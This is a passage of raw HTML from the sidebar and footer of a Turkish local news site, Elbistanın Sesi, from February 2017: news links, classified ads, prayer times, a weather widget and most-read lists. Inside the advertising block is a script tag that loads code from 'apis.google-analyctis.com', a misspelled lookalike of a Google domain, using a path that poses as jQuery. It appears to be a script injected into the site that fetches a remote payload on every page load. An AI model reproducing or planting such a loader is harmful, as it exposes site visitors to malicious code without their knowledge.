src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/yeni_kimligini_alamayanlar_gecici_kimlikle_ygsye_girecek_h37936_e2463.jpg" alt="Yeni kimliğini alamayanlar, ‘Geçici Kimlikle’ YGS’ye girecek" /> <span>Yeni kimliğini alamayanlar, ‘Geçici Kimlikle’...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/akin-irademizin-kalici-olmasi-ve-istikrar-icin-evet-diyecegiz-h37934.html" title="Akın: İrademizin kalıcı olması ve istikrar için ‘evet’ diyeceğiz"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/akin_irademizin_kalici_olmasi_ve_istikrar_icin_evet_diyecegiz_h37934_29396.jpg" alt="Akın: İrademizin kalıcı olması ve istikrar için ‘evet’ diyeceğiz" /> <span>Akın: İrademizin kalıcı olması ve istikrar için...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/santraller-ceyhanin-temizligine-de-engel-h37932.html" title="Santraller, Ceyhan’ın temizliğine de engel"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/santraller_ceyhanin_temizligine_de_engel_h37932_ab1d1.JPG" alt="Santraller, Ceyhan’ın temizliğine de engel" /> <span>Santraller, Ceyhan’ın temizliğine de engel</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/fransiz-elyne-muslumanligi-secti-ismi-elif-oldu-h37931.html" title="Fransız Elyne, Müslümanlığı seçti ismi ‘Elif’ oldu"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/fransiz_elyne_muslumanligi_secti_ismi_elif_oldu_h37931_b73d7.JPG" alt="Fransız Elyne, Müslümanlığı seçti ismi ‘Elif’ oldu" /> <span>Fransız Elyne, Müslümanlığı seçti ismi ‘Elif’...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/darende-kaymakami-gaziantep-te-tutuklandi-h37930.html" title="Darende Kaymakamı Gaziantep&#039;te tutuklandı"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/darende_kaymakami_gaziantep_te_tutuklandi_h37930_f7757.jpg" alt="Darende Kaymakamı Gaziantep&#039;te tutuklandı" /> <span>Darende Kaymakamı Gaziantep&#039;te tutuklandı</span> </a> </div> </div> <div id="syazar"> <div class="header"> <h5><a style="margin-top:10px;" href="http://www.elbistaninsesi.com/seri-ilanlar/ilanver.html" class="this pull-left btn btn-small" title="İlan Ekle"><i class="halflings-icon plus"></i> İlan Ekle</a> <a style="margin-right:65px;font-size:140%;color:red;" href="http://www.elbistaninsesi.com/seri-ilanlar" title="Seri İlanlar">Seri İlanlar</a></h5> <a class="control left" href="#" id="syprev"></a> <a class="control right" href="#" id="synext"></a> </div> <div class="content"> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/sahibinden-satilik-arsa-4109.html" title="sahibinden satılık arsa" >sahibinden satılık arsa</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/sahibinden-satilik-arsa-4109.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="sahibinden satılık arsa" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/sahibinden-satilik-arazi-4108.html" title="SAHİBİNDEN SATILIK ARAZİ" >SAHİBİNDEN SATILIK ARAZİ</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/sahibinden-satilik-arazi-4108.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="SAHİBİNDEN SATILIK ARAZİ" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/maraba-catovda-sulu-tarla-4107.html" title="MARABA ÇATOVDA SULU TARLA" >MARABA ÇATOVDA SULU TARLA</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/maraba-catovda-sulu-tarla-4107.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="MARABA ÇATOVDA SULU TARLA" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/saraykent-40-evler-d-blok-kat-3-satilik-daire-4105.html" title="Saraykent 40 evler D blok kat 3 SATILIK DAİRE" >Saraykent 40 evler D blok kat 3 SATILIK DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/saraykent-40-evler-d-blok-kat-3-satilik-daire-4105.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/9fa416f10f8313c17d1563f7ca9040df426d6786.jpg" alt="Saraykent 40 evler D blok kat 3 SATILIK DAİRE" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/uzum-bagi-asma-tipi-4103.html" title="üzüm bagı asma tipi" >üzüm bagı asma tipi</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/uzum-bagi-asma-tipi-4103.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="üzüm bagı asma tipi" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/sahin-tepesinde-41-daire-4102.html" title="ŞAHİN TEPESİNDE 4+1 DAİRE" >ŞAHİN TEPESİNDE 4+1 DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/sahin-tepesinde-41-daire-4102.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/0f23d24e1f3f7b56a1d26fe1671996793b568aae.jpg" alt="ŞAHİN TEPESİNDE 4+1 DAİRE" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/sahin-tepesinde-41-daire-4101.html" title="ŞAHİN TEPESİNDE 4+1 DAİRE" >ŞAHİN TEPESİNDE 4+1 DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/sahin-tepesinde-41-daire-4101.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/8cd2c165d9dd42b472a368f95f4f52e55d8c8378.jpg" alt="ŞAHİN TEPESİNDE 4+1 DAİRE" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/sahibinden-satilik-arsa-4097.html" title="Sahibinden satılık arsa" >Sahibinden satılık arsa</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/sahibinden-satilik-arsa-4097.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Sahibinden satılık arsa" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/sahibinden-satilik-arsa-4096.html" title="Sahibinden satılık arsa" >Sahibinden satılık arsa</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/sahibinden-satilik-arsa-4096.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Sahibinden satılık arsa" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/ismet-pasa-ilkokulu-arkasi-4095.html" title="İsmet Paşa İlkokulu arkası" >İsmet Paşa İlkokulu arkası</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/ismet-pasa-ilkokulu-arkasi-4095.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="İsmet Paşa İlkokulu arkası" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/beypasajinda-kiralik-dukkan-4094.html" title="BEYPASAJINDA KİRALIK DÜKKAN" >BEYPASAJINDA KİRALIK DÜKKAN</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/beypasajinda-kiralik-dukkan-4094.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="BEYPASAJINDA KİRALIK DÜKKAN" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-dukkan-bey-pasaji-4093.html" title="Kiralık dükkan BEY PASAJI" >Kiralık dükkan BEY PASAJI</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-dukkan-bey-pasaji-4093.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Kiralık dükkan BEY PASAJI" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-31-4092.html" title="Kiralık 3+1" >Kiralık 3+1</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-31-4092.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Kiralık 3+1" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/afsinde-yatirim-icin-ideal-mustakil-arsa-4091.html" title="AFŞİNDE YATIRIM İÇİN İDEAL MÜSTAKİL ARSA" >AFŞİNDE YATIRIM İÇİN İDEAL MÜSTAKİL ARSA</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/afsinde-yatirim-icin-ideal-mustakil-arsa-4091.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/91b010bcaf93403d4849589128a946a691aeb75b.jpg" alt="AFŞİNDE YATIRIM İÇİN İDEAL MÜSTAKİL ARSA" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/sigorta-firmasi-icin-teknik-mudur-4090.html" title="Sigorta Firması İçin Teknik Müdür" >Sigorta Firması İçin Teknik Müdür</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/sigorta-firmasi-icin-teknik-mudur-4090.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/f0c6dc2fad56a11dfd127c96e13784800e95e7f1.jpg" alt="Sigorta Firması İçin Teknik Müdür" class="img-rounded" /></a> </div> </div> </div> </div> </div> <!-- SOSYAL --> <div class="sosyal"> <div class="row-fluid content"> <div class="span6 box facebook"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/fb32.png" alt="Facebook"></div> <div class="right"> <span class="count"><a href="http://facebook.com/elbistaninsesi" target="blank" id="likes">17B</a></span> <span class="text">Beğeni</span> </div> </div> <div class="bottom"> <a href="http://facebook.com/elbistaninsesi" target="blank" rel="nofollow">Facebook'ta Beğen</a> </div> </div> <div class="span6 box twitter"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/twitter32.png" alt="Twitter"></div> <div class="right"> <span class="count"><a href="http://twitter.com/#" target="blank" id="followers"></a></span> <span class="text">Takipçi</span> </div> </div> <div class="bottom"> <a href="http://twitter.com/#" target="blank" rel="nofollow">Twitter'da Takip Et</a> </div> </div> </div> </div> <div id = "nobetci"> <a href="http://www.elbistaninsesi.com/images/dosyalarim/eczane.jpg" title="Nöbetçi Eczane" target="_blank"><img src = "http://www.ugurmumcu.info.tr/wp-content/uploads/2014/05/rb-eczane.png"></a> </div> <!-- NAMAZ VAKITLERI --> <div class="namazvakitleri"> <div class="title"> <h5>Namaz Vakitleri</h5> <select name="namaz" onchange="namaz_vakitleri(this.value); " class="span5 pull-right"> <option value="adana" >Adana</option> <option value="adiyaman" >Adıyaman</option> <option value="afyon" >Afyon</option> <option value="agri" >Ağrı</option> <option value="aksaray" >Aksaray</option> <option value="amasya" >Amasya</option> <option value="ankara" >Ankara</option> <option value="antalya" >Antalya</option> <option value="ardahan" >Ardahan</option> <option value="artvin" >Artvin</option> <option value="aydin" >Aydın</option> <option value="balikesir" >Balıkesir</option> <option value="bartin" >Bartın</option> <option value="batman" >Batman</option> <option value="bayburt" >Bayburt</option> <option value="bilecik" >Bilecik</option> <option value="bingol" >Bingöl</option> <option value="bitlis" >Bitlis</option> <option value="bolu" >Bolu</option> <option value="burdur" >Burdur</option> <option value="bursa" >Bursa</option> <option value="canakkale" >Çanakkale</option> <option value="cankiri" >Çankırı</option> <option value="corum" >Çorum</option> <option value="denizli" >Denizli</option> <option value="diyarbakir" >Diyarbakır</option> <option value="duzce" >Düzce</option> <option value="edirne" >Edirne</option> <option value="elazig" >Elazığ</option> <option value="erzincan" >Erzincan</option> <option value="erzurum" >Erzurum</option> <option value="eskisehir" >Eskişehir</option> <option value="gaziantep" >Gaziantep</option> <option value="giresun" >Giresun</option> <option value="gumushane" >Gümüşhane</option> <option value="hakkari" >Hakkari</option> <option value="hatay" >Hatay</option> <option value="igdir" >Iğdır</option> <option value="isparta" >Isparta</option> <option value="istanbul" >İstanbul</option> <option value="izmir" >İzmir</option> <option value="kahramanmaras" selected>Kahramanmaraş</option> <option value="karabuk" >Karabük</option> <option value="karaman" >Karaman</option> <option value="kars" >Kars</option> <option value="kastamonu" >Kastamonu</option> <option value="kayseri" >Kayseri</option> <option value="kirikkale" >Kırıkkale</option> <option value="kirklareli" >Kırklareli</option> <option value="kirsehir" >Kırşehir</option> <option value="kilis" >Kilis</option> <option value="izmit" >Kocaeli</option> <option value="konya" >Konya</option> <option value="kutahya" >Kütahya</option> <option value="malatya" >Malatya</option> <option value="manisa" >Manisa</option> <option value="mardin" >Mardin</option> <option value="mersin" >Mersin</option> <option value="mugla" >Muğla</option> <option value="mus" >Muş</option> <option value="nevsehir" >Nevşehir</option> <option value="nigde" >Niğde</option> <option value="ordu" >Ordu</option> <option value="osmaniye" >Osmaniye</option> <option value="rize" >Rize</option> <option value="adapazari" >Sakarya</option> <option value="samsun" >Samsun</option> <option value="siirt" >Siirt</option> <option value="sinop" >Sinop</option> <option value="sivas" >Sivas</option> <option value="sanliurfa" >Şanlıurfa</option> <option value="sirnak" >Şırnak</option> <option value="tekirdag" >Tekirdağ</option> <option value="tokat" >Tokat</option> <option value="trabzon" >Trabzon</option> <option value="tunceli" >Tunceli</option> <option value="usak" >Uşak</option> <option value="van" >Van</option> <option value="yalova" >Yalova</option> <option value="yozgat" >Yozgat</option> <option value="zonguldak" >Zonguldak</option> </select> </div> <div class="content"> <div class="sonuc"> <table cellspacing="0" cellpadding="0" id="vakitler"> <tr> <th>İmsak</th> <th>Güneş</th> <th>Öğle</th> <th>İkindi</th> <th>Akşam</th> <th>Yatsı</th> </tr> <tr> <td>05:31</td> <td>07:05</td> <td>12:56</td> <td>16:02</td> <td>18:29</td> <td>19:52</td> </tr> </table> </div> </div> </div> <div class="reklam reklam208"><iframe name=BIKADV src="http://medya.ilan.gov.tr/widgets/YYN-001260-20160610.html" width="300" height="175" frameborder="0" scrolling="no"></iframe> <script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div><a href="http://www.accuweather.com/tr/tr/elbistan/318373/current-weather/318373" class="aw-widget-legal"> <!-- By accessing and/or using this code snippet, you agree to AccuWeather’s terms and conditions (in English) which can be found at http://www.accuweather.com/en/free-weather-widgets/terms and AccuWeather’s Privacy Statement (in English) which can be found at http://www.accuweather.com/en/privacy. --> </a><div id="awtd1452737033699" class="aw-widget-36hour" data-locationkey="318373" data-unit="c" data-language="tr" data-useip="false" data-uid="awtd1452737033699" data-editlocation="false"></div><script type="text/javascript" src="http://oap.accuweather.com/launch.js"></script> <!-- ENCOKLAR --> <div class="encoklar"> <div class="accordion"> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne"> <span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bu Ay Çok Okunanlar</h5></a> </div> <div id="collapseOne" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/guncel/bicaklanan-genc-yasamini-yitirdi-h37907.html" title="Bıçaklanan genç, yaşamını yitirdi" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/bicaklanan_genc_yasamini_yitirdi_h37907_398b0.jpg" alt="Bıçaklanan genç, yaşamını yitirdi" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/bicaklanan-genc-yasamini-yitirdi-h37907.html" title="" ><span class="en-hit">1.</span> <strong>Bıçaklanan genç, yaşamını yitirdi</strong> <span class="en-spot en-hidden">Elbistan’da iki kişi arasında başlayan tartışmanın bıçakların...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/elbistana-sehit-atesi-dustu-h37798.html" title="Elbistana şehit ateşi düştü" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/elbistana_sehit_atesi_dustu_h37798_81eb5.jpg" alt="Elbistana şehit ateşi düştü" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/elbistana-sehit-atesi-dustu-h37798.html" title="" ><span class="en-hit">2.</span> <strong>Elbistan’a şehit ateşi düştü</strong> <span class="en-spot en-hidden">Suriye’nin El Bab kentinden acı haber geldi.</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/elbistan-sehidini-ugurladi-h37806.html" title="Elbistan, şehidini uğurladı" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/elbistan_sehidini_ugurladi_h37806_3e9f5.JPG" alt="Elbistan, şehidini uğurladı" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/elbistan-sehidini-ugurladi-h37806.html" title="" ><span class="en-hit">3.</span> <strong>Elbistan, şehidini uğurladı</strong> <span class="en-spot en-hidden">Fırat Kalkanı harekâtı bölgesinde, Türk Silahlı Kuvvetlerinin (TSK)...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/a-termikte-yangin-3-isci-yaralandi-h37699.html" title="A Termikte yangın: 3 işçi yaralandı" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/a_termikte_yangin_cikti_h37699_fc839.jpg" alt="A Termikte yangın: 3 işçi yaralandı" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/a-termikte-yangin-3-isci-yaralandi-h37699.html" title="" ><span class="en-hit">4.</span> <strong>A Termik’te yangın: 3 işçi yaralandı</strong> <span class="en-spot en-hidden">Afşin-Elbistan A Termik Santrali’nin ikinci ünitesinde elektrik kablolarındaki...</span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/guncel/kura-cekimi-iptal-edildi-h37839.html" title="Kura çekimi iptal edildi" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/kura_cekimi_iptal_edildi_h37839_7d278.jpg" alt="Kura çekimi iptal edildi" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/kura-cekimi-iptal-edildi-h37839.html" title="" ><span class="en-hit">5.</span> <strong>Kura çekimi iptal edildi</strong> <span class="en-spot en-hidden">Yapımı tamamlanan ve önümüzdeki ay içerisinde açılması planlanan...</span></a></div></li> </ul> </div> </div> </div> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo"> <span class="encoklar-icon"><i class="halflings-icon white comments"></i></span><h5>Bu Ay Çok Yorumlananlar</h5></a> </div> <div id="collapseTwo" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/guncel/kura-cekimi-iptal-edildi-h37839.html" title="Kura çekimi iptal edildi" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/kura_cekimi_iptal_edildi_h37839_7d278.jpg" alt="Kura çekimi iptal edildi"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/kura-cekimi-iptal-edildi-h37839.html" title="" ><span class="en-hit">1.</span> <strong>Kura çekimi iptal edildi</strong> <span class="en-spot en-hidden">Yapımı tamamlanan ve önümüzdeki ay içerisinde açılması planlanan...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/abdulkadir-kislal-64-yasinda-h37777.html" title="Abdulkadir Kışlal 64 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/abdulkadir_kislal_64_yasinda_h37777_6cdbb.jpg" alt="Abdulkadir Kışlal 64 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/abdulkadir-kislal-64-yasinda-h37777.html" title="" ><span class="en-hit">2.</span> <strong>Abdulkadir Kışlal 64 yaşında</strong> <span class="en-spot en-hidden">Güneşli Mahallesinden Öğretmen Ayşe Kışlal’ın eşi,</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/saatci-nazmi-gok-93-yasinda-h37782.html" title="Saatçı Nazmi Gök 93 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/saatci_nazmi_gok_93_yasinda_h37782_42f3a.jpg" alt="Saatçı Nazmi Gök 93 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/saatci-nazmi-gok-93-yasinda-h37782.html" title="" ><span class="en-hit">3.</span> <strong>Saatçı Nazmi Gök 93 yaşında</strong> <span class="en-spot en-hidden">Güneşli mahallesinden İsmail ve Zöhre GÖK ailesinin oğlu,</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/serkan-temel-19-yasinda-h37809.html" title="Serkan Temel 19 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/serkan_temel_19_yasinda_h37809_da3d1.jpg" alt="Serkan Temel 19 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/serkan-temel-19-yasinda-h37809.html" title="" ><span class="en-hit">4.</span> <strong>Serkan Temel 19 yaşında</strong> <span class="en-spot en-hidden">Köprübaşı mahallesinden Hasan ve Nuran Temel ailesinin oğlu,</span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/guncel/bicaklanan-genc-yasamini-yitirdi-h37907.html" title="Bıçaklanan genç, yaşamını yitirdi" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/02/bicaklanan_genc_yasamini_yitirdi_h37907_398b0.jpg" alt="Bıçaklanan genç, yaşamını yitirdi"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/bicaklanan-genc-yasamini-yitirdi-h37907.html" title="" ><span class="en-hit">5.</span> <strong>Bıçaklanan genç, yaşamını yitirdi</strong> <span class="en-spot en-hidden">Elbistan’da iki kişi arasında başlayan tartışmanın bıçakların...</span></a></div></li> </ul> </div> </div> </div> </div> </div> <!-- SON YORUMLAR --> <div class="sayfalar"> <div class="header"> <h5>Son Yorumlar</h5> </div> <div class="content"> <ul class="unstyled"> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/santraller-ceyhanin-temizligine-de-engel-h37932.html#comment_173688" title="" >Temizlenmesin zaten yaz oldumu milletin...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/fransiz-elyne-muslumanligi-secti-ismi-elif-oldu-h37931.html#comment_173687" title="" >maşaAllah tebrikler</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistanin-kotasi-500-binden-450-bin-tona-dustu-h37935.html#comment_173686" title="" >doğrumu olmamalı böyle</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/saglik/hastaneye-alim-is-kur-uzerinden-yapilacak-h37922.html#comment_173685" title="" >torpil yaptılar ortaya çıktı diye şimdi...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/akin-irademizin-kalici-olmasi-ve-istikrar-icin-evet-diyecegiz-h37934.html#comment_173684" title="" >Kişi veya kuruluşların referandum ile...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/santraller-ceyhanin-temizligine-de-engel-h37932.html#comment_173683" title="" >Bu ne midem bulandı bu nasıl elbistan...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/saglik/yeni-hastane-gun-sayiyor-h37926.html#comment_173682" title="" >her seçim öncesi söz verilip de tutulmayan...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/akin-irademizin-kalici-olmasi-ve-istikrar-icin-evet-diyecegiz-h37934.html#comment_173680" title="" >hayır deseniz zaten şaşardım diyinde...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/santraller-ceyhanin-temizligine-de-engel-h37932.html#comment_173678" title="" >Üç dört santral daha yapılsın diye...</a></li> <li class="last"><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/saglik/hastaneye-alim-is-kur-uzerinden-yapilacak-h37922.html#comment_173677" title="" >tıbbi sekreter alımı olmayacakmıymış...</a></li> </ul> </div> </div> <!-- ARSIV --> <div class="arsiv"> <div class="header"> <h5>Arşiv</h5> </div> <div class="content"> <form action="http://www.elbistaninsesi.com/?m=arsiv" method="post" name="arsiv" > <select name="gun" class="day span1"> <option value="01" >01</option> <option value="02" >02</option> <option value="03" >03</option> <option value="04" >04</option> <option value="05" >05</option> <option value="06" >06</option> <option value="07" >07</option> <option value="08" >08</option> <option value="09" >09</option> <option value="10" >10</option> <option value="11" >11</option> <option value="12" >12</option> <option value="13" >13</option> <option value="14" >14</option> <option value="15" >15</option> <option value="16" >16</option> <option value="17" >17</option> <option value="18" >18</option> <option value="19" >19</option> <option value="20" >20</option> <option value="21" >21</option> <option value="22" selected>22</option> <option value="23" >23</option> <option value="24" >24</option> <option value="25" >25</option> <option value="26" >26</option> <option value="27" >27</option> <option value="28" >28</option> <option value="29" >29</option> <option value="30" >30</option> <option value="31" >31</option> </select> <select name="ay" class="month span1"> <option value="01" >Ocak</option> <option value="02" selected>Şubat</option> <option value="03" >Mart</option> <option value="04" >Nisan</option> <option value="05" >Mayıs</option> <option value="06" >Haziran</option> <option value="07" >Temmuz</option> <option value="08" >Ağustos</option> <option value="09" >Eylül</option> <option value="10" >Ekim</option> <option value="11" >Kasım</option> <option value="12" >Aralık</option> </select> <select name="yil" class="year span1"> <option value="2017" selected>2017</option> <option value="2016" >2016</option> <option value="2015" >2015</option> <option value="2014" >2014</option> <option value="2013" >2013</option> </select> <button type="submit" class="btn btn-default pull-right">Ara</button> </form> </div> </div> </div> </div> <!-- Sol Dikey Reklam --> <div class="reklam dikey sol" style="width:px;height:px;"> </div> <!-- Sağ Dikey Reklam --> <div class="reklam dikey sag ortala" style="width:165px;height:285px;"> <p style="width:165px;"><a href="http://www.elbistaninsesi.com/banner.php?id=57" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/modelce_1.gif" width="165" height="285" style="width:165px;height: 285px;border:0" alt="banner57" /></a></p> <p style="width:160px;"><a href="http://www.elbistaninsesi.com/banner.php?id=1" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/reklamaksu.gif" width="160" height="260" style="width:160px;height: 260px;border:0" alt="banner1" /></a></p> <p style="width:165px;"><a href="http://www.elbistaninsesi.com/banner.php?id=27" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/HSG_Tur.jpg&w=165&h=293&q=90" width="165" height="293" style="width:165px;height: 293px;border:0" alt="banner27" /></a></p> <p><a href="http://www.elbistaninsesi.com/banner.php?id=58" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/thumb.php?src=http://www.elbistaninsesi.com/images/banner/1.jpg&w=165&h=388&q=90" width="165" height="388" style="width:165px;height: 388px;border:0" alt="banner58" /></a></p> </div> </div> <!-- FOOTER --> <div id="siteFooter" class="footer"> <div class="row-fluid"> <div class="container center"> <div class="span4"> <div>Copyright © 2017 - Tüm hakları saklıdır.<br>Elbistanın Sesi</div> <div class="footer-social"> <a href="http://facebook.com/elbistaninsesi" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a> <a href="http://twitter.com/#" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a> <a href="#" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/google_circle-32.png" alt="GOOGLE PLUS"></a> <a href="http://www.elbistaninsesi.com/rss"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a> </div> </div> <div class="span4 text-center"> <div class="footer-logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img 